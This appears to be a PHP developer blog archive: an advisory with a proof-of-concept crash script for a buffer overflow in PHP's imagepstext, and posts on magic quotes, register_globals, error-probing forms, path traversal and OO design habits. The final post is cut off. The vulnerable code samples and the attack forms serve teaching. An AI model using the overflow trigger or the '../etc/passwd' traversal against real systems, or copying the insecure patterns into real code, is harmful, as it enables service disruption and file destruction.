Dec 14

Description:

Prior to version 5.3.4, PHP’s GD extension did not properly validate
the number of anti-aliasing steps passed to the function imagepstext.
The value of this parameter is expected to be either 4 or 16. To
accommodate this, an array of 16 integers, aa, is located on the
stack. Before the number of steps is validated, it is used to populate
the array. This results in a stack-based buffer overflow.

Proof of concept:

<?php
$img = imagecreatetruecolor(1, 1); //Arbitrary
$fnt = imagepsloadfont("somefont.pfb"); //Arbitrary
//The final parameter is the number of anti-aliasing steps
imagepstext($img, "Testing", $fnt, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA,
0xAAAAAA, 0xAAAAAA, 0, 0, 0.0, 99999);
?>

Result in php 5.3.3 (with gdb):

sh-4.1$ php -v
PHP 5.3.3 (cli) (built: Jul 22 2010 15:37:02)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
sh-4.1$ gdb php
<trimmed>
(gdb) run imagepstext_poc.php
Starting program: /usr/bin/php imagepstext_poc.php
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
    return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
    at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
4257                    aa[i] = gdImageColorResolveAlpha(bg_img, rd, gr, bl, al);
Missing separate debuginfos, use: <trimmed>
(gdb) bt
#0  0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa,
    return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810)
    at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257
#1  0x00aaaaaa in ?? ()
#2  0x00aaaaaa in ?? ()
#3  0x00aaaaaa in ?? ()
#4  0x00aaaaaa in ?? ()
#5  0x00aaaaaa in ?? ()
<etc>

Result in php 5.3.4:

$ ./php-5.3.4 -v
PHP 5.3.4 (cli) (built: Dec 10 2010 10:26:40)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
$ ./php-5.3.4 imagepstext_poc.php

Warning: imagepstext(): AA steps must be 4 or 16 in
/home/…/imagepstext_poc.php on line 4

Tagged with:
Sep 08
Magic Quotes:

What are Magic Quotes:

Magic Quotes is a process that automagically escapes incoming data to the PHP script. It’s preferred to code with magic quotes off and to instead escape the data at runtime, as needed.

Why did we use Magic Quotes:

There is no reason to use magic quotes because they are no longer a supported part of PHP. However, they did exist and did help a few beginners blissfully and unknowingly write better (more secure) code. But, when dealing with code that relies upon this behavior it’s better to update the code instead of turning magic quotes on. So why did this feature exist? Simple, to help prevent SQL Injection. Today developers are better aware of security and end up using database specific escaping mechanisms and/or prepared statements instead of relying upon features like magical quotes.

Why not to use Magic Quotes:

  • Portability Assuming it to be on, or off, affects portability. Use get_magic_quotes_gpc() to check for this, and code accordingly.
  • Performance Because not every piece of escaped data is inserted into a database, there is a performance loss for escaping all this data. Simply calling on the escaping functions (like addslashes()) at runtime is more efficient. Although php.ini-dist enables these directives by default, php.ini-recommended disables it. This recommendation is mainly due to performance reasons.
  • Inconvenience Because not all data needs escaping, it’s often annoying to see escaped data where it shouldn’t be. For example, emailing from a form, and seeing a bunch of \’ within the email. To fix, this may require excessive use of stripslashes().
  • Disabling Magic Quotes:

    The magic_quotes_gpc directive may only be disabled at the system level, and not at runtime. In otherwords, use of ini_set() is not an option.

    Example #1 Disabling magic quotes server side

    An example that sets the value of these directives to Off in php.ini. For additional details, read the manual section titled How to change configuration settings.

    ; Magic quotes ; ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = Off ; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc. magic_quotes_runtime = Off ; Use Sybase-style magic quotes (escape ‘ with ” instead of \’). magic_quotes_sybase = Off

    If access to the server configuration is unavailable, use of .htaccess is also an option. For example:

    php_flag magic_quotes_gpc Off

    In the interest of writing portable code (code that works in any environment), like if setting at the server level is not possible, here’s an example to disable magic_quotes_gpc at runtime. This method is inefficient so it’s preferred to instead set the appropriate directives elsewhere.

    Example #2 Disabling magic quotes at runtime

    <?php

    if (get_magic_quotes_gpc()) {

        function stripslashes_deep($value)

        {

    $value = is_array($value) ?

    array_map('stripslashes_deep', $value) :

    stripslashes($value);

            return $value;

        }

    $_POST = array_map('stripslashes_deep', $_POST);

    $_GET = array_map('stripslashes_deep', $_GET);

    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);

    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);

    }

    ?>

    Tagged with:
    Aug 31

    Using Register Globals

    Perhaps the most controversial change in PHP is when the default value for the PHP directive register_globals went from ON to OFF in PHP » 4.2.0. Reliance on this directive was quite common and many people didn’t even know it existed and assumed it’s just how PHP works. This page will explain how one can write insecure code with this directive but keep in mind that the directive itself isn’t insecure but rather it’s the misuse of it.

    When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn’t require variable initialization means writing insecure code is that much easier. It was a difficult decision, but the PHP community decided to disable this directive by default. When on, people use variables yet really don’t know for sure where they come from and can only assume. Internal variables that are defined in the script itself get mixed up with request data sent by users and disabling register_globals changes this. Let’s demonstrate with an example misuse of register_globals:

    Example 1 Example misuse with register_globals = on

    <?php
    // define $authorized = true only if user is authenticated
    if (authenticated_user()) {
    $authorized = true;
    }
    // Because we didn't first initialize $authorized as false, this might be
    // defined through register_globals, like from GET auth.php?authorized=1
    // So, anyone can be seen as authenticated!
    if ($authorized) {
        include "/highly/sensitive/data.php";
    }
    ?>

    When register_globals = on, our logic above may be compromised. When off, $authorized can’t be set via request so it’ll be fine, although it really is generally a good programming practice to initialize variables first. For example, in our example above we might have first done $authorized = false. Doing this first means our above code would work with register_globals on or off as users by default would be unauthorized.

    Another example is that of sessions. When register_globals = on, we could also use $username in our example below but again you must realize that $username could also come from other means, such as GET (through the URL).

    Example 2 Example use of sessions with register_globals on or off

    <?php
    // We wouldn't know where $username came from but do know $_SESSION is
    // for session data
    if (isset($_SESSION['username'])) {
        echo "Hello <b>{$_SESSION['username']}</b>";
    } else {
        echo "Hello <b>Guest</b><br />";
        echo "Would you like to login?";
    }
    ?>

    It’s even possible to take preventative measures to warn when forging is being attempted. If you know ahead of time exactly where a variable should be coming from, you can check to see if the submitted data is coming from an inappropriate kind of submission. While it doesn’t guarantee that data has not been forged, it does require an attacker to guess the right kind of forging. If you don’t care where the request data comes from, you can use $_REQUEST as it contains a mix of GET, POST and COOKIE data. See also the manual section on using variables from external sources.

    Example #3 Detecting simple variable poisoning

    <?php
    if (isset($_COOKIE['MAGIC_COOKIE'])) {
    // MAGIC_COOKIE comes from a cookie.
        // Be sure to validate the cookie data!
    } elseif (isset($_GET['MAGIC_COOKIE']) || isset($_POST['MAGIC_COOKIE'])) {
    mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']);
       echo "Security violation, admin has been alerted.";
       exit;
    } else {
    // MAGIC_COOKIE isn't set through this REQUEST
    }
    ?>

    Of course, simply turning off register_globals does not mean your code is secure. For every piece of data that is submitted, it should also be checked in other ways. Always validate your user data and initialize your variables! To check for uninitialized variables you may turn up error_reporting() to show E_NOTICE level errors.

    For information about emulating register_globals being On or Off

    Tagged with:
    Aug 28

    Error Reporting

    With PHP security, there are two sides to error reporting. One is beneficial to increasing security, the other is detrimental.

    A standard attack tactic involves profiling a system by feeding it improper data, and checking for the kinds, and contexts, of the errors which are returned. This allows the system cracker to probe for information about the server, to determine possible weaknesses. For example, if an attacker had gleaned information about a page based on a prior form submission, they may attempt to override variables, or modify them:

    Example 1 Attacking Variables with a custom HTML page

    <form method="post" action="attacktarget?username=badfoo&amp;password=badfoo"> <input type="hidden" name="username" value="badfoo" /> <input type="hidden" name="password" value="badfoo" /> </form>

    The PHP errors which are normally returned can be quite helpful to a developer who is trying to debug a script, indicating such things as the function or file that failed, the PHP file it failed in, and the line number which the failure occurred in. This is all information that can be exploited. It is not uncommon for a php developer to use show_source(), highlight_string(), or highlight_file() as a debugging measure, but in a live site, this can expose hidden variables, unchecked syntax, and other dangerous information. Especially dangerous is running code from known sources with built-in debugging handlers, or using common debugging techniques. If the attacker can determine what general technique you are using, they may try to brute-force a page, by sending various common debugging strings:

    Example 2 Exploiting common debugging variables

    <form method="post" action="attacktarget?errors=Y&amp;showerrors=1&amp;debug=1"> <input type="hidden" name="errors" value="Y" /> <input type="hidden" name="showerrors" value="1" /> <input type="hidden" name="debug" value="1" /> </form>

    Regardless of the method of error handling, the ability to probe a system for errors leads to providing an attacker with more information.

    For example, the very style of a generic PHP error indicates a system is running PHP. If the attacker was looking at an .html page, and wanted to probe for the back-end (to look for known weaknesses in the system), by feeding it the wrong data they may be able to determine that a system was built with PHP.

    A function error can indicate whether a system may be running a specific database engine, or give clues as to how a web page or programmed or designed. This allows for deeper investigation into open database ports, or to look for specific bugs or weaknesses in a web page. By feeding different pieces of bad data, for example, an attacker can determine the order of authentication in a script, (from the line number errors) as well as probe for exploits that may be exploited in different locations in the script.

    A filesystem or general PHP error can indicate what permissions the web server has, as well as the structure and organization of files on the web server. Developer written error code can aggravate this problem, leading to easy exploitation of formerly "hidden" information.

    There are three major solutions to this issue. The first is to scrutinize all functions, and attempt to compensate for the bulk of the errors. The second is to disable error reporting entirely on the running code. The third is to use PHP’s custom error handling functions to create your own error handler. Depending on your security policy, you may find all three to be applicable to your situation.

    One way of catching this issue ahead of time is to make use of PHP’s own error_reporting(), to help you secure your code and find variable usage that may be dangerous. By testing your code, prior to deployment, with E_ALL, you can quickly find areas where your variables may be open to poisoning or modification in other ways. Once you are ready for deployment, you should either disable error reporting completely by setting error_reporting() to 0, or turn off the error display using the php.ini option display_errors, to insulate your code from probing. If you choose to do the latter, you should also define the path to your log file using the error_log ini directive, and turn log_errors on.

    Example 3 Finding dangerous variables with E_ALL

    <?php
    if ($username) {  // Not initialized or checked before usage
    $good_login = 1;
    }
    if ($good_login == 1) { // If above test fails, not initialized or checked before usage
    readfile ("/highly/sensitive/data/index.html");
    }
    ?>

    Tagged with:
    Aug 26

    Filesystem Security:

    PHP is subject to the security built into most server systems with respect to permissions on a file and directory basis. This allows you to control which files in the filesystem may be read. Care should be taken with any files which are world readable to ensure that they are safe for reading by all users who have access to that filesystem.

    Since PHP was designed to allow user level access to the filesystem, it’s entirely possible to write a PHP script that will allow you to read system files such as /etc/passwd, modify your ethernet connections, send massive printer jobs out, etc. This has some obvious implications, in that you need to ensure that the files that you read from and write to are the appropriate ones.

    Consider the following script, where a user indicates that they’d like to delete a file in their home directory. This assumes a situation where a PHP web interface is regularly used for file management, so the Apache user is allowed to delete files in the user home directories.

    Example 1:

    <?php
    // remove a file from the user's home directory
    $username = $_POST['user_submitted_name'];
    $userfile = $_POST['user_submitted_filename'];
    $homedir  = "/home/$username";
    unlink("$homedir/$userfile");
    echo "The file has been deleted!";
    ?>

    Since the username and the filename are postable from a user form, they can submit a username and a filename belonging to someone else, and delete it even if they’re not supposed to be allowed to do so. In this case, you’d want to use some other form of authentication. Consider what could happen if the variables submitted were "../etc/" and "passwd". The code would then effectively read:

    Example 2:

    <?php
    // removes a file from anywhere on the hard drive that
    // the PHP user has access to. If PHP has root access:
    $username = $_POST['user_submitted_name']; // "../etc"
    $userfile = $_POST['user_submitted_filename']; // "passwd"
    $homedir  = "/home/$username"; // "/home/../etc"
    unlink("$homedir/$userfile"); // "/home/../etc/passwd"
    echo "The file has been deleted!";
    ?>

    There are two important measures you should take to prevent these issues.

    • Only allow limited permissions to the PHP web user binary.
    • Check all variables which are submitted.

    Here is an improved script:

    Example 3:

    <?php
    // removes a file from the hard drive that
    // the PHP user has access to.
    $username = $_SERVER['REMOTE_USER']; // using an authentication mechanisim
    $userfile = basename($_POST['user_submitted_filename']);
    $homedir  = "/home/$username";
    $filepath = "$homedir/$userfile";
    if (file_exists($filepath) && unlink($filepath)) {
    $logstring = "Deleted $filepath\n";
    } else {
    $logstring = "Failed to delete $filepath\n";
    }
    $fp = fopen("/home/logging/filedelete.log", "a");
    fwrite($fp, $logstring);
    fclose($fp);
    echo htmlentities($logstring, ENT_QUOTES);
    ?>

    However, even this is not without its flaws. If your authentication system allowed users to create their own user logins, and a user chose the login "../etc/", the system is once again exposed. For this reason, you may prefer to write a more customized check:

    Example 4:

    <?php
    $username     = $_SERVER['REMOTE_USER']; // using an authentication mechanisim
    $userfile     = $_POST['user_submitted_filename'];
    $homedir      = "/home/$username";
    $filepath     = "$homedir/$userfile";
    if (!ctype_alnum($username) || !preg_match('/^(?:[a-z0-9_-]|\.(?!\.))+$/iD', $userfile)) {
        die("Bad username/filename");
    }
    //etc...
    ?>

    Depending on your operating system, there are a wide variety of files which you should be concerned about, including device entries (/dev/ or COM1), configuration files (/etc/ files and the .ini files), well known file storage areas (/home/, My Documents), etc. For this reason, it’s usually easier to create a policy where you forbid everything except for what you explicitly allow.

    Tagged with:
    Jun 30

    In the early days of PHP programming, PHP code was limited to being procedural in nature. Procedural code is characterized by the use of procedures for the building blocks of the application. Procedures offer a certain level of reuse by allowing procedures to be called by other procedures.

    However, without object-oriented language constructs, a programmer can still introduce OO characteristics into PHP code. It’s a tad more difficult and can make the code more difficult to read because it’s mixing paradigms (procedural language with pseudo-OO design). OO constructs in PHP code — such as the ability to define and use classes, the ability to build relationships between classes that use inheritance, and the ability to define interfaces — make it much easier to build code that adheres to good OO practices.

    While purely procedural designs without much modularity run just fine, the advantages of OO design show up in the maintenance. Because a typical application will spend the bulk of its lifetime in maintenance, code maintenance is a large expense over the lifetime of an application. It can also be easily forgotten during development. If you’re in a race to get your application developed and deployed, long-term maintainability can take a back seat to getting something to work.

    Modularity — one of the key characteristics of good OO design — helps with this maintenance. Modularity helps encapsulate change, which will make it easier to extend and modify the application over time.

    While there are more than seven habits to building OO software overall, the seven habits here are what you need to make your code fit basic OO design criteria. They give you a firm foundation upon which you can add more OO habits and build software that is easily maintained and extended. These habits target a couple of the key characteristics of modularity. For more information about the benefits of OO design that are language-independent, see Resources.

    The seven good PHP OO habits are:

    1. Be modest.
    2. Be a good neighbor.
    3. Avoid looking at Medusa.
    4. Embrace the weakest link.
    5. You’re rubber; I’m glue.
    6. Keep it in the family.
    7. Think in patterns.

    Be modest

    To be modest is to avoid exposing yourself in your implementations of classes and functions. Hiding your information is a foundational habit. You will have a difficult time building any of the other habits until you have developed the habit of hiding the details of your implementations. Information-hiding is also known as encapsulation.

    There are many reasons why exposing public fields directly is a bad habit, the most important of which is that it leaves you with no options should something in your implementation change. You use OO concepts to isolate change, and encapsulation plays an integral role in making sure that any changes you make aren’t viral in nature. Viral changes are those that start small — like changing an array that holds three elements to one that contains only two. Suddenly, you find that you’re changing more and more of your code to accommodate a change that should have been trivial.

    One simple way to begin hiding your information is to keep fields private and to expose them with public accessors, which are like windows in your house. Instead of having an entire wall open to the outside, you have only a window or two. (I talk more about accessors in "Good habit: Use public accessors.")

    In addition to allowing your implementation behind the curtain to change, using public accessors instead of directly exposing fields allows you to build upon your base implementation by overriding the implementation of an accessor to do something slightly different from the behavior of the parent. It also allows you to build an abstract implementation that defers the actual implementation to classes that override the base.

    Bad habit: Expose public fields

    In the bad code example in Listing 1, the fields of the Person object are exposed directly as public fields instead of with accessors. While this behavior is tempting, especially for lightweight data objects, it limits you.

    Listing 1. Bad habit of exposing public fields

    <?php
    class Person
    {
        public $prefix;
        public $givenName;
        public $familyName;
        public $suffix;
    }
    
    $person = new Person();
    $person->prefix = "Mr.";
    $person->givenName = "John";
    
    echo($person->prefix);
    echo($person->givenName);
    
    ?>

    If anything changes with the object, any code that uses it needs to change as well. For instance, if the person’s given, family, and other names were to be encapsulated in a PersonName object, you would need to modify all your code to accommodate the change.

    Good habit: Use public accessors

    By using good OO habits (see Listing 2), the same object now has private fields instead of public fields, and the private fields are carefully exposed to the outside world by public get and set methods, called accessors. These accessors now provide a public way of getting information from your PHP class so that if something in your implementation changes, the likelihood is lessened that you need to change all the code that uses your class.

    Listing 2. Good habit of using public accessors

    <?php
    class Person
    {
        private $prefix;
        private $givenName;
        private $familyName;
        private $suffix;
    
        public function setPrefix($prefix)
        {
            $this->prefix = $prefix;
        }
    
        public function getPrefix()
        {
            return $this->prefix;
        }
    
        public function setGivenName($gn)
        {
            $this->givenName = $gn;
        }
    
        public function getGivenName()
        {
            return $this->givenName;
        }
    
        public function setFamilyName($fn)
        {
            $this->familyName = $fn;
        }
    
        public function getFamilyName()
        {
            return $this->familyName;
        }
    
        public function setSuffix($suffix)
        {
            $this->suffix = $suffix;
        }
    
        public function getSuffix()
        {
            return $suffix;
        }
    
    }
    
    $person = new Person();
    $person->setPrefix("Mr.");
    $person->setGivenName("John");
    
    echo($person->getPrefix());
    echo($person->getGivenName());
    
    ?>

    At first glance, this may seem like a lot more work, and it may actually be more work on the front end. Typically, however, using good OO habits pays off in the long run, as future changes are greatly solidified.

    In the version of the code shown in Listing 3, I’ve changed the internal implementation to use an associative array for the name parts. Ideally, I’d have more error handling and would be more careful with checking whether the element exists, but the purpose of this example is to show how the code using my class doesn’t need to change — it is blissfully unaware of my class changes. Remember that the reason for adopting OO habits is to carefully encapsulate change so your code is more extensible and maintainable.

    Listing 3. Another twist on this good habit with a different internal implementation

    <?php
    class Person
    {
        private $personName = array();
    
        public function setPrefix($prefix)
        {
            $this->personName['prefix'] = $prefix;
        }
    
        public function getPrefix()
        {
            return $this->personName['prefix'];
        }
    
        public function setGivenName($gn)
        {
            $this->personName['givenName'] = $gn;
        }
    
        public function getGivenName()
        {
            return $this->personName['givenName'];
        }
    
        /* etc... */
    }
    
    /*
     * Even though the internal implementation changed, the code here stays exactly
     * the same. The change has been encapsulated only to the Person class.
     */
    $person = new Person();
    $person->setPrefix("Mr.");
    $person->setGivenName("John");
    
    echo($person->getPrefix());
    echo($person->getGivenName());
    
    ?>

    Be a good neighbor

    When you build a class, it should handle its own errors appropriately. If the class doesn’t know how to handle the errors, it should package them in a format that its caller understands. In addition, avoid returning objects that are null or in an invalid state. Many times, you can do this simply by verifying arguments and throwing specific exceptions that tell why the supplied arguments are invalid. When you build this habit, it can save you — and people maintaining your code or using your objects — a lot of time.

    Bad habit: Not handling errors

    Consider the example shown in Listing 4, which accepts some arguments and returns a Person object with some of the values populated. However, in the parsePersonName() method, there is no validation to see whether the supplied $val variable is null, a zero-length string or perhaps a string in a unparsable format. The parsePersonName() method does not return a Person object, but returns null. Administrators or programmers using this method might be left scratching their heads and — at the very least — be in a place where they need to start setting breakpoints and debugging the PHP script.

    Listing 4. Bad habit of not throwing or handling errors

    class PersonUtils
    {
        public static function parsePersonName($format, $val)
        {
            if (strpos(",", $val) > 0) {
                $person = new Person();
                $parts = split(",", $val); // Assume the value is last, first
                $person->setGivenName($parts[1]);
                $person->setFamilyName($parts[0]);
            }
            return $person;
        }
    }

    The parsePersonName() method in Listing 4 could be modified to initialize the Person object outside the if condition, ensuring that you always get a valid Person object. However, you get a Person with no set properties, which doesn’t leave you in a much better position.

    Good habit: Each module handles its own errors

    Instead of leaving your callers guessing, be proactive about validating arguments. If an unset variable can’t produce a valid result, check for the variable and throw an InvalidArgumentException. If the string can’t be empty or must be in a specific format, check for the format and throw an exception. Listing 5 demonstrates how to create your own exceptions, as well as some new conditions in the parsePerson() method that demonstrate some rudimentary validations.

    Listing 5. Good habit of throwing errors

    <?php
    class InvalidPersonNameFormatException extends LogicException {}
    
    class PersonUtils
    {
        public static function parsePersonName($format, $val)
        {
            if (! $format) {
                throw new InvalidPersonNameFormatException("Invalid PersonName format.");
            }
    
            if ((! isset($val)) || strlen($val) == 0) {
                throw new InvalidArgumentException("Must supply a non-null value to parse.");
            }
    
        }
    }
    ?>

    The bottom line is that you want people to be able to use your class without having to know the inner workings of it. If they use it incorrectly or in a way you didn’t intend, they shouldn’t have to guess why it didn’t work. As a good neighbor, you understand that people reusing your class are not psychic, and, therefore, you take the guesswork out.

    Avoid looking at Medusa

    When I was first learning about OO concepts, I was doubtful that interfaces were really helpful. A colleague of mine drew the analogy that not using interfaces is like looking at the head of Medusa. In Greek mythology, Medusa was a female character with snakes for hair. Any person who looked at her directly turned to stone. Perseus, who killed Medusa, was able to confront her by looking at her reflection in his shield, thus avoiding being turned to stone.

    Interfaces are your mirror in dealing with Medusa. When you use a specific, concrete implementation, your code must change if your implementation code changes. Using implementations directly limits many of your options, as you’ve essentially turned your classes to stone.

    Bad habit: Not using interfaces

    Listing 6 shows an example that loads the Person object from a database. It takes the person’s name and returns the Person object in the database that matches.

    Listing 6. Bad habit of not using interfaces

    <?php
    class DBPersonProvider
    {
        public function getPerson($givenName, $familyName)
        {
            /* go to the database, get the person... */
            $person = new Person();
            $person->setPrefix("Mr.");
            $person->setGivenName("John");
            return $person;
        }
    }
    
    /* I need to get person data... */
    $provider = new DBPersonProvider();
    $person = $provider->getPerson("John", "Doe");
    
    echo($person->getPrefix());
    echo($person->getGivenName());
    
    ?>

    The code for loading Person from the database is fine until something changes in the environment. For example, loading Person from the database may be fine for the first version of the application, but for the second version, you may need to add the ability to load a person from a Web service. In essence, the class has turned to stone because it is directly using the implementation class and is now brittle to change.

    Good habit: Use interfaces

    Listing 7 shows an example of code that does not change as new ways of loading users become available and are implemented. The example shows an interface called PersonProvider, which declares a single method. If any code uses a PersonProvider, the code restrains from using the implementation classes directly. Instead, it uses PersonProvider as if it were a real object.

    Listing 7. Good habit of using interfaces

    <?php
    interface PersonProvider
    {
        public function getPerson($givenName, $familyName);
    }
    
    class DBPersonProvider implements PersonProvider
    {
        public function getPerson($givenName, $familyName)
        {
            /* pretend to go to the database, get the person... */
            $person = new Person();
            $person->setPrefix("Mr.");
            $person->setGivenName("John");
            return $person;
        }
    }
    
    class PersonProviderFactory
    {
        public static function createProvider($type)
        {
            if ($type == 'database')
            {
                return new DBPersonProvider();
            } else {
                return new NullProvider();
            }
        }
    }
    
    $config = 'database';
    /* I need to get person data... */
    $provider = PersonProviderFactory::createProvider($config);
    $person = $provider->getPerson("John", "Doe");
    
    echo($person->getPrefix());
    echo($person->getGivenName());
    ?>

    When you use interfaces, try to avoid ever referring to the implementation classes directly. Instead, use something external to your object to give you the correct implementation. If your class loads the implementation based on some logic, it still needs to require the definitions of all the implementation classes, and that doesn’t get you anywhere.

    You can use a Factory pattern to create an instance of an implementation class that implements your interface. A factory method, by convention, begins with create and returns the interface. It can take whatever arguments are necessary for your factory to figure out which implementation class is the correct one to return.

    In Listing 7, the createProvider() method simply takes a $type. If the $type is set to database, the factory returns an instance of DBPersonProvider. Any new implementation for loading people from a store does not require any changes in the class that uses the factory and interface. The DBPersonProvider implements the PersonProvider interface and has the actual implementation of the getPerson() method in it.

    Embrace the weakest link

    Loosely coupling your modules is a good thing; it’s one of the properties that allows you to encapsulate change. Two of the other habits — "Be modest" and "Avoid looking at Medusa" — help you work toward building modules that are loosely coupled. To loosely couple your classes, develop the final characteristic by building the habit of lowering the dependencies of your classes.

    Bad habit: Tight coupling

    In Listing 8, lowering dependencies is not necessarily lowering the dependencies for the client using an object. Rather, the example demonstrates lowering your dependencies on the correct class and minimizing them elsewhere.

    Listing 8. Bad habit of tight coupling from Address

    <?php
    
    require_once "./AddressFormatters.php";
    
    class Address
    {
        private $addressLine1;
        private $addressLine2;
        private $city;
        private $state; // or province...
        private $postalCode;
        private $country;
    
        public function setAddressLine1($line1)
        {
            $this->addressLine1 = $line1;
        }
    
    		/* accessors, etc... */
    
        public function getCountry()
        {
            return $this->country;
        }
    
        public function format($type)
        {
            if ($type == "inline") {
                $formatter = new InlineAddressFormatter();
            } else if ($type == "multiline") {
                $formatter = new MultilineAddressFormatter();
            } else {
                $formatter = new NullAddressFormatter();
            }
            return $formatter->format($this->getAddressLine1(),
                $this->getAddressLine2(),
                $this->getCity(), $this->getState(), $this->getPostalCode(),
                $this->getCountry());
        }
    }
    
    $addr = new Address();
    $addr->setAddressLine1("123 Any St.");
    $addr->setAddressLine2("Ste 200");
    $addr->setCity("Anytown");
    $addr->setState("AY");
    $addr->setPostalCode("55555-0000");
    $addr->setCountry("US");
    
    echo($addr->format("multiline"));
    echo("\n");
    
    echo($addr->format("inline"));
    echo("\n");
    
    ?>

    The code that calls the format() method on the Address object might look great — all it does is use the Address class, call format(), and it’s done. In contrast, the Address class is not so lucky. It needs to know about the various formatters used to properly format it, which might not make the Address object very reusable for someone else, particularly if that someone else isn’t interested in using the formatter classes in the format() method. Although the code using Address doesn’t have many dependencies, the Address class does have quite a few when it probably should just be a simple data object.

    The Address class is tightly coupled with the implementation classes that know how to format the Address object.

    Good habit: Loose coupling between objects

    When building good OO designs, it’s necessary to think about a concept called Separation of Concerns (SoC). SoC means that you try to separate objects by what they should be really concerned about, thus, lowering the coupling. In the original Address class, it had to be concerned about how to format itself. That’s probably not a good design. Rather, an Address class should think about the parts of the Address, while some type of formatter should worry about how to properly format the address.

    In Listing 9, the code that formatted the address is moved to interfaces, implementation classes, and a factory — building the "use interfaces" habit. Now, the AddressFormatUtils class is responsible for creating a formatter and formatting an Address. Any other object now can use an Address without having to worry about also requiring the definitions of the formatters.

    Listing 9. Good habit of loose coupling between objects

    <?php
    
    interface AddressFormatter
    {
        public function format($addressLine1, $addressLine2, $city, $state,
            $postalCode, $country);
    }
    
    class MultiLineAddressFormatter implements AddressFormatter
    {
        public function format($addressLine1, $addressLine2, $city, $state,
            $postalCode, $country)
        {
            return sprintf("%s\n%s\n%s, %s %s\n%s",
                $addressLine1, $addressLine2, $city, $state, $postalCode, $country);
        }
    }
    
    class InlineAddressFormatter implements AddressFormatter
    {
        public function format($addressLine1, $addressLine2, $city, $state,
            $postalCode, $country)
        {
            return sprintf("%s %s, %s, %s %s %s",
                $addressLine1, $addressLine2, $city, $state, $postalCode, $country);
        }
    }
    
    class AddressFormatUtils
    {
        public static function formatAddress($type, $address)
        {
            $formatter = AddressFormatUtils::createAddressFormatter($type);
    
            return $formatter->format($address->getAddressLine1(),
                $address->getAddressLine2(),
                $address->getCity(), $address->getState(),
                $address->getPostalCode(),
                $address->getCountry());
        }
    
        private static function createAddressFormatter($type)
        {
            if ($type == "inline") {
                $formatter = new InlineAddressFormatter();
            } else if ($type == "multiline") {
                $formatter = new MultilineAddressFormatter();
            } else {
                $formatter = new NullAddressFormatter();
            }
            return $formatter;
        }
    }
    
    $addr = new Address();
    $addr->setAddressLine1("123 Any St.");
    $addr->setAddressLine2("Ste 200");
    $addr->setCity("Anytown");
    $addr->setState("AY");
    $addr->setPostalCode("55555-0000");
    $addr->setCountry("US");
    
    echo(AddressFormatUtils::formatAddress("multiline", $addr));
    echo("\n");
    
    echo(AddressFormatUtils::formatAddress("inline", $addr));
    echo("\n");
    ?>

    The drawback, of course, is that whenever patterns are used, it often means the amount of artifacts (classes, files) goes up. However, this increase is offset by the decreased maintenance in each class and can be decreased even more when proper reusability is gained.

    You’re rubber; I’m glue

    Highly cohesive OO designs are focused and organized in related modules. Learning about "concerns" is important in determining how to organize functions and classes to be tightly cohesive.

    Bad habit: Low cohesion

    When a design has low cohesion, it has classes and methods that are not grouped well. The term spaghetti code is often used to describe classes and methods that are bunched together and have low cohesion. Listing 10 provides an example of spaghetti code. The relatively generic Utils class uses many different objects and has many dependencies. It does a bit of everything, making it difficult to reuse.

    Listing 10. Bad habit of low cohesion

    <?php
    
    class Utils
    {
        public static function formatAddress($formatType, $address1,
            $address2, $city, $state)
        {
            return "some address string";
        }
    
        public static function formatPersonName($formatType, $givenName,
            $familyName)
        {
            return "some person name";
        }
    
        public static function parseAddress($formatType, $val)
        {
            // real implementation would set values, etc...
            return new Address();
        }
    
        public static function parseTelephoneNumber($formatType, $val)
        {
            // real implementation would set values, etc...
            return new TelephoneNumber();
        }
    }
    
    ?>

    Good habit: Embrace high cohesion

    High cohesion means that classes and methods that are related to each other are grouped. If methods and classes are highly cohesive, you are able to easily split off entire groups without affecting the design. Designs with high cohesion offer the opportunity for lower coupling. Listing 11 shows two of the methods that are better organized into classes. The AddressUtils class contains methods for dealing with Address classes and shows high cohesion among the address-related methods. Likewise, PersonUtils contains methods that deal specifically with Person objects. These two new classes with their highly cohesive methods have low coupling because they can be used completely independently of one another.

    Listing 11. Good habit of high cohesion

    <?php
    
    class AddressUtils
    {
        public static function formatAddress($formatType, $address1,
            $address2, $city, $state)
        {
            return "some address string";
        }
    
        public static function parseAddress($formatType, $val)
        {
            // real implementation would set values, etc...
            return new Address();
        }
    
    }
    
    class PersonUtils
    {
        public static function formatPersonName($formatType, $givenName,
            $familyName)
        {
            return "some person name";
        }
    
        public static function parsePersonName($formatType, $val)
        {
            // real implementation would set values, etc...
            return new PersonName();
        }
    }
    
    ?>

    Keep it in the family

    I often tell people on the software teams on which I’ve been a technical lead or architect that the greatest enemy of OO languages is a copy-and-paste operation. When used in the absence of an up-front OO design, nothing creates more havoc than copying code from one file to the next. Wherever you’re tempted to copy code from one class to the next, stop and consider how you can use class hierarchies to leverage similar or identical functionality. You will find that in most cases, with good design, copying code is completely unnecessary.

    Bad habit: Not using class hierarchies

    Listing 12 shows a simple example of partial classes. They start with duplicate fields and methods — not good in the long term when the application might need to change. If there was a defect in the Person class, there would most likely be a defect in the Employee class as well because it appears as though the implementation was copied between the two.

    Listing 12. Bad habit of not using hierarchies

    <?php
    class Person
    {
        private $givenName;
        private $familyName;
    }
    
    class Employee
    {
        private $givenName;
        private $familyName;
    }
    
    ?>

    Inheritance is a difficult habit to start using because often, the analysis to build proper inheritance models can take a lot of time. Conversely, using Ctrl+C and Ctrl+V to build new implementations takes only seconds. But the time is usually offset rather quickly in maintenance, where the application will actually spend most of its time.

    Good habit: Leverage inheritance

